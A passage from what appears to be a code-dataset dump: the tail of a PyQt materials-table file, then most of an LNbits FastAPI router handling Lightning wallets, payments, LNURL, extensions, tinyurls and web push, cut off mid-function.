hkl in enumerate(hkls):\n table_item = QTableWidgetItem(hkl)\n table_item.setTextAlignment(Qt.AlignCenter)\n self.ui.table.setItem(i, 0, table_item)\n\n table_item = QTableWidgetItem('%.2f' % d_spacings[i])\n table_item.setTextAlignment(Qt.AlignCenter)\n self.ui.table.setItem(i, 1, table_item)\n\n table_item = QTableWidgetItem('%.2f' % math.degrees(tth[i]))\n table_item.setTextAlignment(Qt.AlignCenter)\n self.ui.table.setItem(i, 2, table_item)\n\n self.update_table_selections()\n self.update_material_name()\n\n def move_dialog_to_left(self):\n # This moves the dialog to the left border of the parent\n parent = self.ui.parent()\n if not parent:\n return\n\n ph = parent.geometry().height()\n px = parent.geometry().x()\n py = parent.geometry().y()\n dw = self.ui.width()\n dh = self.ui.height()\n self.ui.setGeometry(px, py + (ph - dh) / 2.0, dw, dh)\n","repo_name":"cjh1/hexrdgui","sub_path":"hexrd/ui/materials_table.py","file_name":"materials_table.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"34983771313","text":"import asyncio\nimport base64\nimport hashlib\nimport json\nimport uuid\nfrom http import HTTPStatus\nfrom io import BytesIO\nfrom typing import Dict, List, Optional, Union\nfrom urllib.parse import ParseResult, parse_qs, unquote, urlencode, urlparse, urlunparse\n\nimport httpx\nimport pyqrcode\nfrom fastapi import (\n APIRouter,\n Body,\n Depends,\n Header,\n Request,\n WebSocket,\n WebSocketDisconnect,\n)\nfrom fastapi.exceptions import HTTPException\nfrom fastapi.responses import JSONResponse\nfrom loguru import logger\nfrom sse_starlette.sse import EventSourceResponse\nfrom starlette.responses import RedirectResponse, StreamingResponse\n\nfrom lnbits import bolt11, lnurl\nfrom lnbits.core.db import core_app_extra, db\nfrom lnbits.core.helpers import (\n migrate_extension_database,\n stop_extension_background_work,\n)\nfrom lnbits.core.models import (\n ConversionData,\n CreateInvoice,\n CreateLnurl,\n CreateLnurlAuth,\n CreateWallet,\n CreateWebPushSubscription,\n DecodePayment,\n Payment,\n PaymentFilters,\n PaymentHistoryPoint,\n Query,\n User,\n Wallet,\n WalletType,\n WebPushSubscription,\n)\nfrom lnbits.db import Filters, Page\nfrom lnbits.decorators import (\n WalletTypeInfo,\n check_admin,\n get_key_type,\n parse_filters,\n require_admin_key,\n require_invoice_key,\n)\nfrom lnbits.extension_manager import (\n CreateExtension,\n Extension,\n ExtensionRelease,\n InstallableExtension,\n fetch_github_release_config,\n get_valid_extensions,\n)\nfrom lnbits.helpers import generate_filter_params_openapi, url_for\nfrom lnbits.settings import settings\nfrom lnbits.utils.exchange_rates import (\n currencies,\n fiat_amount_as_satoshis,\n satoshis_amount_as_fiat,\n)\n\nfrom ..crud import (\n DateTrunc,\n add_installed_extension,\n create_account,\n create_tinyurl,\n create_wallet,\n create_webpush_subscription,\n delete_dbversion,\n delete_installed_extension,\n delete_tinyurl,\n delete_wallet,\n delete_webpush_subscription,\n drop_extension_db,\n get_dbversions,\n get_payments,\n get_payments_history,\n get_payments_paginated,\n get_standalone_payment,\n get_tinyurl,\n get_tinyurl_by_url,\n get_wallet_for_key,\n get_webpush_subscription,\n save_balance_check,\n update_pending_payments,\n update_wallet,\n)\nfrom ..services import (\n InvoiceFailure,\n PaymentFailure,\n check_transaction_status,\n create_invoice,\n fee_reserve_total,\n pay_invoice,\n perform_lnurlauth,\n websocketManager,\n websocketUpdater,\n)\nfrom ..tasks import api_invoice_listeners\n\napi_router = APIRouter()\n\n\n@api_router.get(\"/api/v1/health\", status_code=HTTPStatus.OK)\nasync def health():\n return\n\n\n@api_router.get(\"/api/v1/wallet\")\nasync def api_wallet(wallet: WalletTypeInfo = Depends(get_key_type)):\n if wallet.wallet_type == WalletType.admin:\n return {\n \"id\": wallet.wallet.id,\n \"name\": wallet.wallet.name,\n \"balance\": wallet.wallet.balance_msat,\n }\n else:\n return {\"name\": wallet.wallet.name, \"balance\": wallet.wallet.balance_msat}\n\n\n@api_router.put(\"/api/v1/wallet/{new_name}\")\nasync def api_update_wallet_name(\n new_name: str, wallet: WalletTypeInfo = Depends(require_admin_key)\n):\n await update_wallet(wallet.wallet.id, new_name)\n return {\n \"id\": wallet.wallet.id,\n \"name\": wallet.wallet.name,\n \"balance\": wallet.wallet.balance_msat,\n }\n\n\n@api_router.patch(\"/api/v1/wallet\", response_model=Wallet)\nasync def api_update_wallet(\n name: Optional[str] = Body(None),\n currency: Optional[str] = Body(None),\n wallet: WalletTypeInfo = Depends(require_admin_key),\n):\n return await update_wallet(wallet.wallet.id, name, currency)\n\n\n@api_router.delete(\"/api/v1/wallet\")\nasync def api_delete_wallet(\n wallet: WalletTypeInfo = Depends(require_admin_key),\n) -> None:\n await delete_wallet(\n user_id=wallet.wallet.user,\n wallet_id=wallet.wallet.id,\n )\n\n\n@api_router.post(\"/api/v1/wallet\", response_model=Wallet)\nasync def api_create_wallet(\n data: CreateWallet,\n wallet: WalletTypeInfo = Depends(require_admin_key),\n) -> Wallet:\n return await create_wallet(user_id=wallet.wallet.user, wallet_name=data.name)\n\n\n@api_router.post(\"/api/v1/account\", response_model=Wallet)\nasync def api_create_account(data: CreateWallet) -> Wallet:\n if not settings.new_accounts_allowed:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=\"Account creation is disabled.\",\n )\n account = await create_account()\n return await create_wallet(user_id=account.id, wallet_name=data.name)\n\n\n@api_router.get(\n \"/api/v1/payments\",\n name=\"Payment List\",\n summary=\"get list of payments\",\n response_description=\"list of payments\",\n response_model=List[Payment],\n openapi_extra=generate_filter_params_openapi(PaymentFilters),\n)\nasync def api_payments(\n wallet: WalletTypeInfo = Depends(get_key_type),\n filters: Filters = Depends(parse_filters(PaymentFilters)),\n):\n await update_pending_payments(wallet.wallet.id)\n return await get_payments(\n wallet_id=wallet.wallet.id,\n pending=True,\n complete=True,\n filters=filters,\n )\n\n\n@api_router.get(\n \"/api/v1/payments/history\",\n name=\"Get payments history\",\n response_model=List[PaymentHistoryPoint],\n openapi_extra=generate_filter_params_openapi(PaymentFilters),\n)\nasync def api_payments_history(\n wallet: WalletTypeInfo = Depends(get_key_type),\n group: DateTrunc = Query(\"day\"),\n filters: Filters[PaymentFilters] = Depends(parse_filters(PaymentFilters)),\n):\n await update_pending_payments(wallet.wallet.id)\n return await get_payments_history(wallet.wallet.id, group, filters)\n\n\n@api_router.get(\n \"/api/v1/payments/paginated\",\n name=\"Payment List\",\n summary=\"get paginated list of payments\",\n response_description=\"list of payments\",\n response_model=Page[Payment],\n openapi_extra=generate_filter_params_openapi(PaymentFilters),\n)\nasync def api_payments_paginated(\n wallet: WalletTypeInfo = Depends(get_key_type),\n filters: Filters = Depends(parse_filters(PaymentFilters)),\n):\n await update_pending_payments(wallet.wallet.id)\n page = await get_payments_paginated(\n wallet_id=wallet.wallet.id,\n pending=True,\n complete=True,\n filters=filters,\n )\n return page\n\n\nasync def api_payments_create_invoice(data: CreateInvoice, wallet: Wallet):\n description_hash = b\"\"\n unhashed_description = b\"\"\n memo = data.memo or settings.lnbits_site_title\n if data.description_hash or data.unhashed_description:\n if data.description_hash:\n try:\n description_hash = bytes.fromhex(data.description_hash)\n except ValueError:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=\"'description_hash' must be a valid hex string\",\n )\n if data.unhashed_description:\n try:\n unhashed_description = bytes.fromhex(data.unhashed_description)\n except ValueError:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=\"'unhashed_description' must be a valid hex string\",\n )\n # do not save memo if description_hash or unhashed_description is set\n memo = \"\"\n\n async with db.connect() as conn:\n try:\n payment_hash, payment_request = await create_invoice(\n wallet_id=wallet.id,\n amount=data.amount,\n memo=memo,\n currency=data.unit,\n description_hash=description_hash,\n unhashed_description=unhashed_description,\n expiry=data.expiry,\n extra=data.extra,\n webhook=data.webhook,\n internal=data.internal,\n conn=conn,\n )\n # NOTE: we get the checking_id with a seperate query because create_invoice\n # does not return it and it would be a big hustle to change its return type\n # (used across extensions)\n payment_db = await get_standalone_payment(payment_hash, conn=conn)\n assert payment_db is not None, \"payment not found\"\n checking_id = payment_db.checking_id\n except InvoiceFailure as e:\n raise HTTPException(status_code=520, detail=str(e))\n except Exception as exc:\n raise exc\n\n invoice = bolt11.decode(payment_request)\n\n lnurl_response: Union[None, bool, str] = None\n if data.lnurl_callback:\n if data.lnurl_balance_check is not None:\n await save_balance_check(wallet.id, data.lnurl_balance_check)\n\n async with httpx.AsyncClient() as client:\n try:\n r = await client.get(\n data.lnurl_callback,\n params={\n \"pr\": payment_request,\n \"balanceNotify\": url_for(\n f\"/withdraw/notify/{urlparse(data.lnurl_callback).netloc}\",\n external=True,\n wal=wallet.id,\n ),\n },\n timeout=10,\n )\n if r.is_error:\n lnurl_response = r.text\n else:\n resp = json.loads(r.text)\n if resp[\"status\"] != \"OK\":\n lnurl_response = resp[\"reason\"]\n else:\n lnurl_response = True\n except (httpx.ConnectError, httpx.RequestError) as ex:\n logger.error(ex)\n lnurl_response = False\n\n return {\n \"payment_hash\": invoice.payment_hash,\n \"payment_request\": payment_request,\n # maintain backwards compatibility with API clients:\n \"checking_id\": checking_id,\n \"lnurl_response\": lnurl_response,\n }\n\n\nasync def api_payments_pay_invoice(\n bolt11: str, wallet: Wallet, extra: Optional[dict] = None\n):\n try:\n payment_hash = await pay_invoice(\n wallet_id=wallet.id, payment_request=bolt11, extra=extra\n )\n except ValueError as e:\n raise HTTPException(status_code=HTTPStatus.BAD_REQUEST, detail=str(e))\n except PermissionError as e:\n raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail=str(e))\n except PaymentFailure as e:\n raise HTTPException(status_code=520, detail=str(e))\n except Exception as exc:\n raise exc\n\n return {\n \"payment_hash\": payment_hash,\n # maintain backwards compatibility with API clients:\n \"checking_id\": payment_hash,\n }\n\n\n@api_router.post(\n \"/api/v1/payments\",\n summary=\"Create or pay an invoice\",\n description=\"\"\"\n This endpoint can be used both to generate and pay a BOLT11 invoice.\n To generate a new invoice for receiving funds into the authorized account,\n specify at least the first four fields in the POST body: `out: false`,\n `amount`, `unit`, and `memo`. To pay an arbitrary invoice from the funds\n already in the authorized account, specify `out: true` and use the `bolt11`\n field to supply the BOLT11 invoice to be paid.\n \"\"\",\n status_code=HTTPStatus.CREATED,\n)\nasync def api_payments_create(\n wallet: WalletTypeInfo = Depends(require_invoice_key),\n invoiceData: CreateInvoice = Body(...),\n):\n if invoiceData.out is True and wallet.wallet_type == WalletType.admin:\n if not invoiceData.bolt11:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=\"BOLT11 string is invalid or not given\",\n )\n return await api_payments_pay_invoice(\n invoiceData.bolt11, wallet.wallet, invoiceData.extra\n ) # admin key\n elif not invoiceData.out:\n # invoice key\n return await api_payments_create_invoice(invoiceData, wallet.wallet)\n else:\n raise HTTPException(\n status_code=HTTPStatus.UNAUTHORIZED,\n detail=\"Invoice (or Admin) key required.\",\n )\n\n\n@api_router.get(\"/api/v1/payments/fee-reserve\")\nasync def api_payments_fee_reserve(invoice: str = Query(\"invoice\")) -> JSONResponse:\n invoice_obj = bolt11.decode(invoice)\n if invoice_obj.amount_msat:\n response = {\n \"fee_reserve\": fee_reserve_total(invoice_obj.amount_msat),\n }\n return JSONResponse(response)\n else:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=\"Invoice has no amount.\",\n )\n\n\n@api_router.post(\"/api/v1/payments/lnurl\")\nasync def api_payments_pay_lnurl(\n data: CreateLnurl, wallet: WalletTypeInfo = Depends(require_admin_key)\n):\n domain = urlparse(data.callback).netloc\n\n async with httpx.AsyncClient() as client:\n try:\n r = await client.get(\n data.callback,\n params={\"amount\": data.amount, \"comment\": data.comment},\n timeout=40,\n )\n if r.is_error:\n raise httpx.ConnectError(\"LNURL callback connection error\")\n except (httpx.ConnectError, httpx.RequestError):\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"Failed to connect to {domain}.\",\n )\n\n params = json.loads(r.text)\n if params.get(\"status\") == \"ERROR\":\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"{domain} said: '{params.get('reason', '')}'\",\n )\n\n if not params.get(\"pr\"):\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"{domain} did not return a payment request.\",\n )\n\n invoice = bolt11.decode(params[\"pr\"])\n if invoice.amount_msat != data.amount:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=(\n (\n f\"{domain} returned an invalid invoice. Expected\"\n f\" {data.amount} msat, got {invoice.amount_msat}.\"\n ),\n ),\n )\n\n extra = {}\n\n if params.get(\"successAction\"):\n extra[\"success_action\"] = params[\"successAction\"]\n if data.comment:\n extra[\"comment\"] = data.comment\n assert data.description is not None, \"description is required\"\n payment_hash = await pay_invoice(\n wallet_id=wallet.wallet.id,\n payment_request=params[\"pr\"],\n description=data.description,\n extra=extra,\n )\n\n return {\n \"success_action\": params.get(\"successAction\"),\n \"payment_hash\": payment_hash,\n # maintain backwards compatibility with API clients:\n \"checking_id\": payment_hash,\n }\n\n\nasync def subscribe_wallet_invoices(request: Request, wallet: Wallet):\n \"\"\"\n Subscribe to new invoices for a wallet. Can be wrapped in EventSourceResponse.\n Listenes invoming payments for a wallet and yields jsons with payment details.\n \"\"\"\n this_wallet_id = wallet.id\n\n payment_queue: asyncio.Queue[Payment] = asyncio.Queue(0)\n\n uid = f\"{this_wallet_id}_{str(uuid.uuid4())[:8]}\"\n logger.debug(f\"adding sse listener for wallet: {uid}\")\n api_invoice_listeners[uid] = payment_queue\n\n try:\n while True:\n if await request.is_disconnected():\n await request.close()\n break\n payment: Payment = await payment_queue.get()\n if payment.wallet_id == this_wallet_id:\n logger.debug(\"sse listener: payment received\", payment)\n yield dict(data=payment.json(), event=\"payment-received\")\n except asyncio.CancelledError:\n logger.debug(f\"removing listener for wallet {uid}\")\n except Exception as exc:\n logger.error(f\"Error in sse: {exc}\")\n finally:\n api_invoice_listeners.pop(uid)\n\n\n@api_router.get(\"/api/v1/payments/sse\")\nasync def api_payments_sse(\n request: Request, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n return EventSourceResponse(\n subscribe_wallet_invoices(request, wallet.wallet),\n ping=20,\n media_type=\"text/event-stream\",\n )\n\n\n# TODO: refactor this route into a public and admin one\n@api_router.get(\"/api/v1/payments/{payment_hash}\")\nasync def api_payment(payment_hash, X_Api_Key: Optional[str] = Header(None)):\n # We use X_Api_Key here because we want this call to work with and without keys\n # If a valid key is given, we also return the field \"details\", otherwise not\n wallet = await get_wallet_for_key(X_Api_Key) if isinstance(X_Api_Key, str) else None\n wallet = wallet if wallet and not wallet.deleted else None\n # we have to specify the wallet id here, because postgres and sqlite return\n # internal payments in different order and get_standalone_payment otherwise\n # just fetches the first one, causing unpredictable results\n payment = await get_standalone_payment(\n payment_hash, wallet_id=wallet.id if wallet else None\n )\n if payment is None:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"Payment does not exist.\"\n )\n await check_transaction_status(payment.wallet_id, payment_hash)\n payment = await get_standalone_payment(\n payment_hash, wallet_id=wallet.id if wallet else None\n )\n if not payment:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"Payment does not exist.\"\n )\n elif not payment.pending:\n if wallet and wallet.id == payment.wallet_id:\n return {\"paid\": True, \"preimage\": payment.preimage, \"details\": payment}\n return {\"paid\": True, \"preimage\": payment.preimage}\n\n try:\n await payment.check_status()\n except Exception:\n if wallet and wallet.id == payment.wallet_id:\n return {\"paid\": False, \"details\": payment}\n return {\"paid\": False}\n\n if wallet and wallet.id == payment.wallet_id:\n return {\n \"paid\": not payment.pending,\n \"preimage\": payment.preimage,\n \"details\": payment,\n }\n return {\"paid\": not payment.pending, \"preimage\": payment.preimage}\n\n\n@api_router.get(\"/api/v1/lnurlscan/{code}\")\nasync def api_lnurlscan(code: str, wallet: WalletTypeInfo = Depends(get_key_type)):\n try:\n url = lnurl.decode(code)\n domain = urlparse(url).netloc\n except Exception:\n # parse internet identifier (user@domain.com)\n name_domain = code.split(\"@\")\n if len(name_domain) == 2 and len(name_domain[1].split(\".\")) >= 2:\n name, domain = name_domain\n url = (\n (\"http://\" if domain.endswith(\".onion\") else \"https://\")\n + domain\n + \"/.well-known/lnurlp/\"\n + name\n )\n # will proceed with these values\n else:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"invalid lnurl\"\n )\n\n # params is what will be returned to the client\n params: Dict = {\"domain\": domain}\n\n if \"tag=login\" in url:\n params.update(kind=\"auth\")\n params.update(callback=url) # with k1 already in it\n\n lnurlauth_key = wallet.wallet.lnurlauth_key(domain)\n assert lnurlauth_key.verifying_key\n params.update(pubkey=lnurlauth_key.verifying_key.to_string(\"compressed\").hex())\n else:\n async with httpx.AsyncClient(follow_redirects=True) as client:\n r = await client.get(url, timeout=5)\n r.raise_for_status()\n if r.is_error:\n raise HTTPException(\n status_code=HTTPStatus.SERVICE_UNAVAILABLE,\n detail={\"domain\": domain, \"message\": \"failed to get parameters\"},\n )\n\n try:\n data = json.loads(r.text)\n except json.decoder.JSONDecodeError:\n raise HTTPException(\n status_code=HTTPStatus.SERVICE_UNAVAILABLE,\n detail={\n \"domain\": domain,\n \"message\": f\"got invalid response '{r.text[:200]}'\",\n },\n )\n\n try:\n tag: str = data.get(\"tag\")\n params.update(**data)\n if tag == \"channelRequest\":\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail={\n \"domain\": domain,\n \"kind\": \"channel\",\n \"message\": \"unsupported\",\n },\n )\n elif tag == \"withdrawRequest\":\n params.update(kind=\"withdraw\")\n params.update(fixed=data[\"minWithdrawable\"] == data[\"maxWithdrawable\"])\n\n # callback with k1 already in it\n parsed_callback: ParseResult = urlparse(data[\"callback\"])\n qs: Dict = parse_qs(parsed_callback.query)\n qs[\"k1\"] = data[\"k1\"]\n\n # balanceCheck/balanceNotify\n if \"balanceCheck\" in data:\n params.update(balanceCheck=data[\"balanceCheck\"])\n\n # format callback url and send to client\n parsed_callback = parsed_callback._replace(\n query=urlencode(qs, doseq=True)\n )\n params.update(callback=urlunparse(parsed_callback))\n elif tag == \"payRequest\":\n params.update(kind=\"pay\")\n params.update(fixed=data[\"minSendable\"] == data[\"maxSendable\"])\n\n params.update(\n description_hash=hashlib.sha256(\n data[\"metadata\"].encode()\n ).hexdigest()\n )\n metadata = json.loads(data[\"metadata\"])\n for [k, v] in metadata:\n if k == \"text/plain\":\n params.update(description=v)\n if k in (\"image/jpeg;base64\", \"image/png;base64\"):\n data_uri = f\"data:{k},{v}\"\n params.update(image=data_uri)\n if k in (\"text/email\", \"text/identifier\"):\n params.update(targetUser=v)\n params.update(commentAllowed=data.get(\"commentAllowed\", 0))\n\n except KeyError as exc:\n raise HTTPException(\n status_code=HTTPStatus.SERVICE_UNAVAILABLE,\n detail={\n \"domain\": domain,\n \"message\": f\"lnurl JSON response invalid: {exc}\",\n },\n )\n\n return params\n\n\n@api_router.post(\"/api/v1/payments/decode\", status_code=HTTPStatus.OK)\nasync def api_payments_decode(data: DecodePayment) -> JSONResponse:\n payment_str = data.data\n try:\n if payment_str[:5] == \"LNURL\":\n url = lnurl.decode(payment_str)\n return JSONResponse({\"domain\": url})\n else:\n invoice = bolt11.decode(payment_str)\n return JSONResponse(invoice.data)\n except Exception as exc:\n return JSONResponse(\n {\"message\": f\"Failed to decode: {str(exc)}\"},\n status_code=HTTPStatus.BAD_REQUEST,\n )\n\n\n@api_router.post(\"/api/v1/lnurlauth\")\nasync def api_perform_lnurlauth(\n data: CreateLnurlAuth, wallet: WalletTypeInfo = Depends(require_admin_key)\n):\n err = await perform_lnurlauth(data.callback, wallet=wallet)\n if err:\n raise HTTPException(\n status_code=HTTPStatus.SERVICE_UNAVAILABLE, detail=err.reason\n )\n return \"\"\n\n\n@api_router.get(\"/api/v1/currencies\")\nasync def api_list_currencies_available():\n if len(settings.lnbits_allowed_currencies) > 0:\n return [\n item\n for item in currencies.keys()\n if item.upper() in settings.lnbits_allowed_currencies\n ]\n return list(currencies.keys())\n\n\n@api_router.post(\"/api/v1/conversion\")\nasync def api_fiat_as_sats(data: ConversionData):\n output = {}\n if data.from_ == \"sat\":\n output[\"BTC\"] = data.amount / 100000000\n output[\"sats\"] = int(data.amount)\n for currency in data.to.split(\",\"):\n output[currency.strip().upper()] = await satoshis_amount_as_fiat(\n data.amount, currency.strip()\n )\n return output\n else:\n output[data.from_.upper()] = data.amount\n output[\"sats\"] = await fiat_amount_as_satoshis(data.amount, data.from_)\n output[\"BTC\"] = output[\"sats\"] / 100000000\n return output\n\n\n@api_router.get(\"/api/v1/qrcode/{data}\", response_class=StreamingResponse)\nasync def img(data):\n qr = pyqrcode.create(data)\n stream = BytesIO()\n qr.svg(stream, scale=3)\n stream.seek(0)\n\n async def _generator(stream: BytesIO):\n yield stream.getvalue()\n\n return StreamingResponse(\n _generator(stream),\n headers={\n \"Content-Type\": \"image/svg+xml\",\n \"Cache-Control\": \"no-cache, no-store, must-revalidate\",\n \"Pragma\": \"no-cache\",\n \"Expires\": \"0\",\n },\n )\n\n\n@api_router.websocket(\"/api/v1/ws/{item_id}\")\nasync def websocket_connect(websocket: WebSocket, item_id: str):\n await websocketManager.connect(websocket, item_id)\n try:\n while True:\n await websocket.receive_text()\n except WebSocketDisconnect:\n websocketManager.disconnect(websocket)\n\n\n@api_router.post(\"/api/v1/ws/{item_id}\")\nasync def websocket_update_post(item_id: str, data: str):\n try:\n await websocketUpdater(item_id, data)\n return {\"sent\": True, \"data\": data}\n except Exception:\n return {\"sent\": False, \"data\": data}\n\n\n@api_router.get(\"/api/v1/ws/{item_id}/{data}\")\nasync def websocket_update_get(item_id: str, data: str):\n try:\n await websocketUpdater(item_id, data)\n return {\"sent\": True, \"data\": data}\n except Exception:\n return {\"sent\": False, \"data\": data}\n\n\n@api_router.post(\"/api/v1/extension\")\nasync def api_install_extension(\n data: CreateExtension, user: User = Depends(check_admin)\n):\n release = await InstallableExtension.get_extension_release(\n data.ext_id, data.source_repo, data.archive\n )\n if not release:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"Release not found\"\n )\n\n if not release.is_version_compatible:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"Incompatible extension version\"\n )\n\n ext_info = InstallableExtension(\n id=data.ext_id, name=data.ext_id, installed_release=release, icon=release.icon\n )\n\n ext_info.download_archive()\n\n try:\n ext_info.extract_archive()\n\n extension = Extension.from_installable_ext(ext_info)\n\n db_version = (await get_dbversions()).get(data.ext_id, 0)\n await migrate_extension_database(extension, db_version)\n\n await add_installed_extension(ext_info)\n\n # call stop while the old routes are still active\n await stop_extension_background_work(data.ext_id, user.id)\n\n if data.ext_id not in settings.lnbits_deactivated_extensions:\n settings.lnbits_deactivated_extensions += [data.ext_id]\n\n # mount routes for the new version\n core_app_extra.register_new_ext_routes(extension)\n\n if extension.upgrade_hash:\n ext_info.nofiy_upgrade()\n\n return extension\n\n except Exception as ex:\n logger.warning(ex)\n ext_info.clean_extension_files()\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR,\n detail=(\n f\"Failed to install extension {ext_info.id} \"\n f\"({ext_info.installed_version}).\"\n ),\n )\n\n\n@api_router.delete(\"/api/v1/extension/{ext_id}\")\nasync def api_uninstall_extension(ext_id: str, user: User = Depends(check_admin)):\n installable_extensions = await InstallableExtension.get_installable_extensions()\n\n extensions = [e for e in installable_extensions if e.id == ext_id]\n if len(extensions) == 0:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"Unknown extension id: {ext_id}\",\n )\n\n # check that other extensions do not depend on this one\n for valid_ext_id in list(map(lambda e: e.code, get_valid_extensions())):\n installed_ext = next(\n (ext for ext in installable_extensions if ext.id == valid_ext_id), None\n )\n if installed_ext and ext_id in installed_ext.dependencies:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=(\n f\"Cannot uninstall. Extension '{installed_ext.name}' \"\n \"depends on this one.\"\n ),\n )\n\n try:\n # call stop while the old routes are still active\n await stop_extension_background_work(ext_id, user.id)\n\n if ext_id not in settings.lnbits_deactivated_extensions:\n settings.lnbits_deactivated_extensions += [ext_id]\n\n for ext_info in extensions:\n ext_info.clean_extension_files()\n await delete_installed_extension(ext_id=ext_info.id)\n\n logger.success(f\"Extension '{ext_id}' uninstalled.\")\n except Exception as ex:\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(ex)\n )\n\n\n@api_router.get(\n \"/api/v1/extension/{ext_id}/releases\", dependencies=[Depends(check_admin)]\n)\nasync def get_extension_releases(ext_id: str):\n try:\n extension_releases: List[\n ExtensionRelease\n ] = await InstallableExtension.get_extension_releases(ext_id)\n\n return extension_releases\n\n except Exception as ex:\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(ex)\n )\n\n\n@api_router.get(\n \"/api/v1/extension/release/{org}/{repo}/{tag_name}\",\n dependencies=[Depends(check_admin)],\n)\nasync def get_extension_release(org: str, repo: str, tag_name: str):\n try:\n config = await fetch_github_release_config(org, repo, tag_name)\n if not config:\n return {}\n\n return {\n \"min_lnbits_version\": config.min_lnbits_version,\n \"is_version_compatible\": config.is_version_compatible(),\n \"warning\": config.warning,\n }\n except Exception as ex:\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(ex)\n )\n\n\n@api_router.delete(\n \"/api/v1/extension/{ext_id}/db\",\n dependencies=[Depends(check_admin)],\n)\nasync def delete_extension_db(ext_id: str):\n try:\n db_version = (await get_dbversions()).get(ext_id, None)\n if not db_version:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"Unknown extension id: {ext_id}\",\n )\n await drop_extension_db(ext_id=ext_id)\n await delete_dbversion(ext_id=ext_id)\n logger.success(f\"Database removed for extension '{ext_id}'\")\n except HTTPException as ex:\n logger.error(ex)\n raise ex\n except Exception as ex:\n logger.error(ex)\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR,\n detail=f\"Cannot delete data for extension '{ext_id}'\",\n )\n\n\n@api_router.post(\n \"/api/v1/tinyurl\",\n name=\"Tinyurl\",\n description=\"creates a tinyurl\",\n)\nasync def api_create_tinyurl(\n url: str, endless: bool = False, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n tinyurls = await get_tinyurl_by_url(url)\n try:\n for tinyurl in tinyurls:\n if tinyurl:\n if tinyurl.wallet == wallet.wallet.inkey:\n return tinyurl\n return await create_tinyurl(url, endless, wallet.wallet.inkey)\n except Exception:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"Unable to create tinyurl\"\n )\n\n\n@api_router.get(\n \"/api/v1/tinyurl/{tinyurl_id}\",\n name=\"Tinyurl\",\n description=\"get a tinyurl by id\",\n)\nasync def api_get_tinyurl(\n tinyurl_id: str, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n try:\n tinyurl = await get_tinyurl(tinyurl_id)\n if tinyurl:\n if tinyurl.wallet == wallet.wallet.inkey:\n return tinyurl\n raise HTTPException(\n status_code=HTTPStatus.FORBIDDEN, detail=\"Wrong key provided.\"\n )\n except Exception:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"Unable to fetch tinyurl\"\n )\n\n\n@api_router.delete(\n \"/api/v1/tinyurl/{tinyurl_id}\",\n name=\"Tinyurl\",\n description=\"delete a tinyurl by id\",\n)\nasync def api_delete_tinyurl(\n tinyurl_id: str, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n try:\n tinyurl = await get_tinyurl(tinyurl_id)\n if tinyurl:\n if tinyurl.wallet == wallet.wallet.inkey:\n await delete_tinyurl(tinyurl_id)\n return {\"deleted\": True}\n raise HTTPException(\n status_code=HTTPStatus.FORBIDDEN, detail=\"Wrong key provided.\"\n )\n except Exception:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"Unable to delete\"\n )\n\n\n@api_router.get(\n \"/t/{tinyurl_id}\",\n name=\"Tinyurl\",\n description=\"redirects a tinyurl by id\",\n)\nasync def api_tinyurl(tinyurl_id: str):\n tinyurl = await get_tinyurl(tinyurl_id)\n if tinyurl:\n response = RedirectResponse(url=tinyurl.url)\n return response\n else:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"unable to find tinyurl\"\n )\n\n\n@api_router.post(\"/api/v1/webpush\", status_code=HTTPStatus.CREATED)\nasync def api_create_webpush_subscription(\n request: Request,\n data: CreateWebPushSubscription,\n wallet: WalletTypeInfo = Depends(require_admin_key),\n) -> WebPushSubscription:\n subscription = json.loads(data.subscription)\n endpoint = subscription[\"endpoint\"]\n host = urlparse(str(request.url)).netloc\n\n subscription = await get_webpush_subscription(endpoint, wallet.wallet.user)\n if subscription:\n return subscription\n else:\n return await create_webpush_subscription(\n endpoint,\n wallet.wallet.user,\n data.subscription,\n host,\n )\n\n\n@api_router.delete(\"/api/v1/webpush\", status_code=HTTPStatus.OK)\nasync def api_delete_webpush_subscription(\n request: Request,\n wallet: WalletTypeInfo = Depends(require_admin_key),\n):\n endpoint = unquote(\n base64.b64decode(str(request.query_params.get(\"endpoint\"))).decode(\"utf-8\")\n )\n await delete_webpush_subscription(endpoint, 